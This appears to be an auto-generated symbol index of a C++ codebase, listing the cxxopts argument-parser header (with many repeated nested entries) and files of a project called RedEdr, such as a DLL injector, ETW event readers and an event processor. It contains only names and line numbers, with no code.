        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method count (line 1726) | std::size_t
      method OptionValue (line 1745) | const OptionValue&
      method as_optional (line 1767) | std::optional<T>
      method arguments_string (line 1801) | const std::string
    function ParseResult (line 2496) | inline ParseResult
      class Iterator (line 1615) | class Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method ParseResult (line 1698) | ParseResult() = default;
      method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
      method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
      method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
      method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
      method Iterator (line 1714) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method Iterator (line 1720) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method count (line 1726) | std::size_t
      method OptionValue (line 1745) | const OptionValue&
      method as_optional (line 1767) | std::optional<T>
      method arguments_string (line 1801) | const std::string
    function String (line 2751) | inline
    function HelpGroupDetails (line 2899) | inline
  type std (line 267) | namespace std {
    function begin (line 269) | inline
    function end (line 276) | inline
  type cxxopts (line 288) | namespace cxxopts {
    function String (line 144) | inline
    class UnicodeStringIterator (line 156) | class UnicodeStringIterator
      method UnicodeStringIterator (line 166) | UnicodeStringIterator(const icu::UnicodeString* string, int32_t pos)
      method value_type (line 172) | value_type
      method UnicodeStringIterator (line 190) | UnicodeStringIterator&
      method UnicodeStringIterator (line 197) | UnicodeStringIterator
    function CXXOPTS_DIAGNOSTIC_POP (line 207) | CXXOPTS_DIAGNOSTIC_POP
    function String (line 216) | inline
    function String (line 229) | String&
    function stringLength (line 241) | inline
    function toUTF8String (line 248) | inline
    function empty (line 258) | inline
    function T (line 293) | T
    function stringLength (line 299) | inline
    function String (line 306) | inline
    function String (line 313) | inline
    function String (line 321) | String&
    function toUTF8String (line 328) | std::string
    function empty (line 334) | inline
    class Value (line 362) | class Value : public std::enable_shared_from_this<Value>
    function CXXOPTS_DIAGNOSTIC_POP (line 409) | CXXOPTS_DIAGNOSTIC_POP
    function throw_or_mimic (line 565) | void throw_or_mimic(const std::string& text)
    type values (line 585) | namespace values {
      type parser_tool (line 587) | namespace parser_tool {
        type IntegerDesc (line 589) | struct IntegerDesc
        type ArguDesc (line 595) | struct ArguDesc {
        function IntegerDesc (line 603) | inline IntegerDesc SplitInteger(const std::string& text)
        function IsTrueText (line 632) | inline bool IsTrueText(const std::string& text)
        function IsFalseText (line 650) | inline bool IsFalseText(const std::string& text)
        function OptionNames (line 668) | inline OptionNames split_option_names(const std::string& text)
        function ArguDesc (line 714) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
        function IntegerDesc (line 787) | inline IntegerDesc SplitInteger(const std::string& text)
        function IsTrueText (line 814) | inline bool IsTrueText(const std::string& text)
        function IsFalseText (line 822) | inline bool IsFalseText(const std::string& text)
        function OptionNames (line 833) | inline OptionNames split_option_names(const std::string& text)
        function ArguDesc (line 851) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
      type detail (line 877) | namespace detail {
        type SignedCheck (line 880) | struct SignedCheck
        type SignedCheck<T, true> (line 883) | struct SignedCheck<T, true>
        type SignedCheck<T, false> (line 907) | struct SignedCheck<T, false>
        function check_signed_range (line 915) | void
      function checked_negate (line 924) | void
      function checked_negate (line 934) | void
      function integer_parser (line 941) | void
      function stringstream_parser (line 1011) | void stringstream_parser(const std::string& text, T& value)
      function parse_value (line 1023) | void parse_value(const std::string& text, T& value)
      function parse_value (line 1028) | inline
      function parse_value (line 1047) | inline
      function parse_value (line 1060) | void
      function parse_value (line 1067) | void
      function parse_value (line 1076) | inline
      function parse_value (line 1088) | void
      function add_value (line 1107) | void
      function add_value (line 1114) | void
      type type_is_container (line 1123) | struct type_is_container
      type type_is_container<std::vector<T>> (line 1129) | struct type_is_container<std::vector<T>>
      class abstract_value (line 1135) | class abstract_value : public Value
        method abstract_value (line 1140) | abstract_value()
        method abstract_value (line 1146) | explicit abstract_value(T* t)
        method abstract_value (line 1153) | abstract_value& operator=(const abstract_value&) = default;
        method abstract_value (line 1155) | abstract_value(const abstract_value& rhs)
        method add (line 1173) | void
        method parse (line 1179) | void
        method is_container (line 1185) | bool
        method parse (line 1191) | void
        method has_default (line 1197) | bool
        method has_implicit (line 1203) | bool
        method default_value (line 1209) | std::shared_ptr<Value>
        method implicit_value (line 1217) | std::shared_ptr<Value>
        method no_implicit_value (line 1225) | std::shared_ptr<Value>
        method get_default_value (line 1232) | std::string
        method get_implicit_value (line 1238) | std::string
        method is_boolean (line 1244) | bool
        method T (line 1250) | const T&
      class standard_value (line 1272) | class standard_value : public abstract_value<T>
        method override (line 1279) | const override
      class standard_value<bool> (line 1286) | class standard_value<bool> : public abstract_value<bool>
        method standard_value (line 1291) | standard_value()
        method standard_value (line 1296) | explicit standard_value(bool* b)
        method clone (line 1303) | std::shared_ptr<Value>
        method set_default_and_implicit (line 1311) | void
    function value (line 1324) | std::shared_ptr<Value>
    function value (line 1331) | std::shared_ptr<Value>
    class OptionAdder (line 1337) | class OptionAdder
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function CXXOPTS_NODISCARD (line 1339) | CXXOPTS_NODISCARD
    class OptionDetails (line 1348) | class OptionDetails
      method OptionDetails (line 1351) | OptionDetails
      method OptionDetails (line 1367) | OptionDetails(const OptionDetails& rhs)
      method OptionDetails (line 1374) | OptionDetails(OptionDetails&& rhs) = default;
      method CXXOPTS_NODISCARD (line 1376) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1383) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1389) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1396) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1403) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1410) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1417) | CXXOPTS_NODISCARD
      method hash (line 1424) | std::size_t
    type HelpOptionDetails (line 1440) | struct HelpOptionDetails
    type HelpGroupDetails (line 1454) | struct HelpGroupDetails
    class OptionValue (line 1461) | class OptionValue
      method add (line 1464) | void
      method parse (line 1477) | void
      method parse_default (line 1490) | void
      method parse_no_value (line 1499) | void
      method noexcept (line 1512) | const noexcept
      method CXXOPTS_NODISCARD (line 1522) | CXXOPTS_NODISCARD
      method T (line 1530) | const T&
      method as_optional (line 1543) | std::optional<T>
      method ensure_value (line 1554) | void
    class KeyValue (line 1572) | class KeyValue
      method KeyValue (line 1575) | KeyValue(std::string key_, std::string value_) noexcept
      method CXXOPTS_NODISCARD (line 1581) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1588) | CXXOPTS_NODISCARD
      method T (line 1596) | T
    class ParseResult (line 1612) | class ParseResult
      class Iterator (line 1615) | class Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method ParseResult (line 1698) | ParseResult() = default;
      method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
      method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
      method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
      method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
      method Iterator (line 1714) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method Iterator (line 1720) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method count (line 1726) | std::size_t
      method OptionValue (line 1745) | const OptionValue&
      method as_optional (line 1767) | std::optional<T>
      method arguments_string (line 1801) | const std::string
    type Option (line 1824) | struct Option
      method Option (line 1826) | Option
    class OptionParser (line 1850) | class OptionParser
      method OptionParser (line 1853) | OptionParser(const OptionMap& options, const PositionalList& positio...
    class Options (line 1908) | class Options
      method Options (line 1912) | explicit Options(std::string program_name, std::string help_string =...
      method Options (line 1925) | Options&
      method Options (line 1932) | Options&
      method Options (line 1939) | Options&
      method Options (line 1946) | Options&
      method Options (line 1953) | Options&
      method Options (line 1960) | Options&
      method add_option (line 1998) | void
      method parse_positional (line 2025) | void
    class OptionAdder (line 2084) | class OptionAdder
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function String (line 2112) | String
    function String (line 2158) | String
    function OptionAdder (line 2303) | inline
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function OptionAdder (line 2310) | inline
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function ParseResult (line 2487) | inline
      class Iterator (line 1615) | class Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method ParseResult (line 1698) | ParseResult() = default;
      method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
      method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
      method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
      method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
      method Iterator (line 1714) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method Iterator (line 1720) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method count (line 1726) | std::size_t
      method OptionValue (line 1745) | const OptionValue&
      method as_optional (line 1767) | std::optional<T>
      method arguments_string (line 1801) | const std::string
    function ParseResult (line 2496) | inline ParseResult
      class Iterator (line 1615) | class Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method ParseResult (line 1698) | ParseResult() = default;
      method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
      method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
      method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
      method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
      method Iterator (line 1714) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method Iterator (line 1720) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method count (line 1726) | std::size_t
      method OptionValue (line 1745) | const OptionValue&
      method as_optional (line 1767) | std::optional<T>
      method arguments_string (line 1801) | const std::string
    function String (line 2751) | inline
    function HelpGroupDetails (line 2899) | inline
  type cxxopts (line 346) | namespace cxxopts {
    function String (line 144) | inline
    class UnicodeStringIterator (line 156) | class UnicodeStringIterator
      method UnicodeStringIterator (line 166) | UnicodeStringIterator(const icu::UnicodeString* string, int32_t pos)
      method value_type (line 172) | value_type
      method UnicodeStringIterator (line 190) | UnicodeStringIterator&
      method UnicodeStringIterator (line 197) | UnicodeStringIterator
    function CXXOPTS_DIAGNOSTIC_POP (line 207) | CXXOPTS_DIAGNOSTIC_POP
    function String (line 216) | inline
    function String (line 229) | String&
    function stringLength (line 241) | inline
    function toUTF8String (line 248) | inline
    function empty (line 258) | inline
    function T (line 293) | T
    function stringLength (line 299) | inline
    function String (line 306) | inline
    function String (line 313) | inline
    function String (line 321) | String&
    function toUTF8String (line 328) | std::string
    function empty (line 334) | inline
    class Value (line 362) | class Value : public std::enable_shared_from_this<Value>
    function CXXOPTS_DIAGNOSTIC_POP (line 409) | CXXOPTS_DIAGNOSTIC_POP
    function throw_or_mimic (line 565) | void throw_or_mimic(const std::string& text)
    type values (line 585) | namespace values {
      type parser_tool (line 587) | namespace parser_tool {
        type IntegerDesc (line 589) | struct IntegerDesc
        type ArguDesc (line 595) | struct ArguDesc {
        function IntegerDesc (line 603) | inline IntegerDesc SplitInteger(const std::string& text)
        function IsTrueText (line 632) | inline bool IsTrueText(const std::string& text)
        function IsFalseText (line 650) | inline bool IsFalseText(const std::string& text)
        function OptionNames (line 668) | inline OptionNames split_option_names(const std::string& text)
        function ArguDesc (line 714) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
        function IntegerDesc (line 787) | inline IntegerDesc SplitInteger(const std::string& text)
        function IsTrueText (line 814) | inline bool IsTrueText(const std::string& text)
        function IsFalseText (line 822) | inline bool IsFalseText(const std::string& text)
        function OptionNames (line 833) | inline OptionNames split_option_names(const std::string& text)
        function ArguDesc (line 851) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
      type detail (line 877) | namespace detail {
        type SignedCheck (line 880) | struct SignedCheck
        type SignedCheck<T, true> (line 883) | struct SignedCheck<T, true>
        type SignedCheck<T, false> (line 907) | struct SignedCheck<T, false>
        function check_signed_range (line 915) | void
      function checked_negate (line 924) | void
      function checked_negate (line 934) | void
      function integer_parser (line 941) | void
      function stringstream_parser (line 1011) | void stringstream_parser(const std::string& text, T& value)
      function parse_value (line 1023) | void parse_value(const std::string& text, T& value)
      function parse_value (line 1028) | inline
      function parse_value (line 1047) | inline
      function parse_value (line 1060) | void
      function parse_value (line 1067) | void
      function parse_value (line 1076) | inline
      function parse_value (line 1088) | void
      function add_value (line 1107) | void
      function add_value (line 1114) | void
      type type_is_container (line 1123) | struct type_is_container
      type type_is_container<std::vector<T>> (line 1129) | struct type_is_container<std::vector<T>>
      class abstract_value (line 1135) | class abstract_value : public Value
        method abstract_value (line 1140) | abstract_value()
        method abstract_value (line 1146) | explicit abstract_value(T* t)
        method abstract_value (line 1153) | abstract_value& operator=(const abstract_value&) = default;
        method abstract_value (line 1155) | abstract_value(const abstract_value& rhs)
        method add (line 1173) | void
        method parse (line 1179) | void
        method is_container (line 1185) | bool
        method parse (line 1191) | void
        method has_default (line 1197) | bool
        method has_implicit (line 1203) | bool
        method default_value (line 1209) | std::shared_ptr<Value>
        method implicit_value (line 1217) | std::shared_ptr<Value>
        method no_implicit_value (line 1225) | std::shared_ptr<Value>
        method get_default_value (line 1232) | std::string
        method get_implicit_value (line 1238) | std::string
        method is_boolean (line 1244) | bool
        method T (line 1250) | const T&
      class standard_value (line 1272) | class standard_value : public abstract_value<T>
        method override (line 1279) | const override
      class standard_value<bool> (line 1286) | class standard_value<bool> : public abstract_value<bool>
        method standard_value (line 1291) | standard_value()
        method standard_value (line 1296) | explicit standard_value(bool* b)
        method clone (line 1303) | std::shared_ptr<Value>
        method set_default_and_implicit (line 1311) | void
    function value (line 1324) | std::shared_ptr<Value>
    function value (line 1331) | std::shared_ptr<Value>
    class OptionAdder (line 1337) | class OptionAdder
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function CXXOPTS_NODISCARD (line 1339) | CXXOPTS_NODISCARD
    class OptionDetails (line 1348) | class OptionDetails
      method OptionDetails (line 1351) | OptionDetails
      method OptionDetails (line 1367) | OptionDetails(const OptionDetails& rhs)
      method OptionDetails (line 1374) | OptionDetails(OptionDetails&& rhs) = default;
      method CXXOPTS_NODISCARD (line 1376) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1383) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1389) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1396) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1403) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1410) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1417) | CXXOPTS_NODISCARD
      method hash (line 1424) | std::size_t
    type HelpOptionDetails (line 1440) | struct HelpOptionDetails
    type HelpGroupDetails (line 1454) | struct HelpGroupDetails
    class OptionValue (line 1461) | class OptionValue
      method add (line 1464) | void
      method parse (line 1477) | void
      method parse_default (line 1490) | void
      method parse_no_value (line 1499) | void
      method noexcept (line 1512) | const noexcept
      method CXXOPTS_NODISCARD (line 1522) | CXXOPTS_NODISCARD
      method T (line 1530) | const T&
      method as_optional (line 1543) | std::optional<T>
      method ensure_value (line 1554) | void
    class KeyValue (line 1572) | class KeyValue
      method KeyValue (line 1575) | KeyValue(std::string key_, std::string value_) noexcept
      method CXXOPTS_NODISCARD (line 1581) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1588) | CXXOPTS_NODISCARD
      method T (line 1596) | T
    class ParseResult (line 1612) | class ParseResult
      class Iterator (line 1615) | class Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method ParseResult (line 1698) | ParseResult() = default;
      method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
      method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
      method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
      method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
      method Iterator (line 1714) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method Iterator (line 1720) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method count (line 1726) | std::size_t
      method OptionValue (line 1745) | const OptionValue&
      method as_optional (line 1767) | std::optional<T>
      method arguments_string (line 1801) | const std::string
    type Option (line 1824) | struct Option
      method Option (line 1826) | Option
    class OptionParser (line 1850) | class OptionParser
      method OptionParser (line 1853) | OptionParser(const OptionMap& options, const PositionalList& positio...
    class Options (line 1908) | class Options
      method Options (line 1912) | explicit Options(std::string program_name, std::string help_string =...
      method Options (line 1925) | Options&
      method Options (line 1932) | Options&
      method Options (line 1939) | Options&
      method Options (line 1946) | Options&
      method Options (line 1953) | Options&
      method Options (line 1960) | Options&
      method add_option (line 1998) | void
      method parse_positional (line 2025) | void
    class OptionAdder (line 2084) | class OptionAdder
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function String (line 2112) | String
    function String (line 2158) | String
    function OptionAdder (line 2303) | inline
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function OptionAdder (line 2310) | inline
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function ParseResult (line 2487) | inline
      class Iterator (line 1615) | class Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method ParseResult (line 1698) | ParseResult() = default;
      method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
      method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
      method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
      method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
      method Iterator (line 1714) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method Iterator (line 1720) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method count (line 1726) | std::size_t
      method OptionValue (line 1745) | const OptionValue&
      method as_optional (line 1767) | std::optional<T>
      method arguments_string (line 1801) | const std::string
    function ParseResult (line 2496) | inline ParseResult
      class Iterator (line 1615) | class Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method ParseResult (line 1698) | ParseResult() = default;
      method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
      method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
      method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
      method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
      method Iterator (line 1714) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method Iterator (line 1720) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method count (line 1726) | std::size_t
      method OptionValue (line 1745) | const OptionValue&
      method as_optional (line 1767) | std::optional<T>
      method arguments_string (line 1801) | const std::string
    function String (line 2751) | inline
    function HelpGroupDetails (line 2899) | inline

FILE: RedEdr/dllinjector.cpp
  function BOOL (line 11) | BOOL remote_inject(DWORD target_pid) {

FILE: RedEdr/dllreader.cpp
  function DllReaderInit (line 34) | bool DllReaderInit(std::vector<HANDLE>& threads) {
  function DWORD (line 63) | DWORD WINAPI DllReaderThread(LPVOID param) {
  function DllReaderClientThread (line 109) | void DllReaderClientThread(PipeServer* pipeServer) {
  function DllReaderShutdown (line 159) | void DllReaderShutdown() {

FILE: RedEdr/etwreader.cpp
  function trace_in_progress (line 25) | void trace_in_progress(BOOL use) {
  function event_callback_process (line 32) | void event_callback_process(const EVENT_RECORD& record, const krabs::tra...
  function event_callback_antimalware (line 65) | void event_callback_antimalware(const EVENT_RECORD& record, const krabs:...
  function event_callback_defendertrace (line 136) | void event_callback_defendertrace(const EVENT_RECORD& record, const krab...
  function BOOL (line 239) | BOOL InitializeEtwReader(std::vector<HANDLE>& threads) {
  function DWORD (line 273) | DWORD WINAPI TraceProcessingThread(LPVOID param) {
  function EtwReaderStopAll (line 459) | void EtwReaderStopAll() {

FILE: RedEdr/event_aggregator.cpp
  function BOOL (line 63) | BOOL EventAggregator::HasMoreEvents() {

FILE: RedEdr/event_aggregator.h
  function class (line 9) | class EventAggregator {

FILE: RedEdr/event_augmenter.cpp
  function AugmentEvent (line 14) | void AugmentEvent(nlohmann::json& j, Process *process) {
  function AugmentEventWithMemAddrInfo (line 19) | void AugmentEventWithMemAddrInfo(nlohmann::json& j, Process *process) {

FILE: RedEdr/event_processor.cpp
  function DWORD (line 265) | DWORD WINAPI EventProcessorThread(LPVOID param) {
  function InitializeEventProcessor (line 295) | int InitializeEventProcessor(std::vector<HANDLE>& threads) {
  function StopEventProcessor (line 315) | void StopEventProcessor() {

FILE: RedEdr/event_processor.h
  function class (line 12) | class EventProcessor {

FILE: RedEdr/httplib.h
  function namespace (line 295) | namespace httplib {
  function scope_exit (line 333) | struct scope_exit {
  function release (line 347) | void release() { this->execute_on_destruction = false; }
  type StatusCode (line 360) | enum StatusCode {
  type Response (line 442) | struct Response
  type MultipartFormData (line 445) | struct MultipartFormData {
  function class (line 454) | class DataSink {
  type MultipartFormDataProvider (line 495) | struct MultipartFormDataProvider {
  function class (line 513) | class ContentReader {
  function const (line 528) | bool operator()(ContentReceiver receiver) const {
  type Request (line 539) | struct Request {
  type Response (line 591) | struct Response {
  function class (line 641) | class Stream {
  function enqueue (line 684) | bool enqueue(std::function<void()> fn) override {
  function shutdown (line 697) | void shutdown() override {
  type worker (line 713) | struct worker {
  function Error (line 1045) | enum class Error {
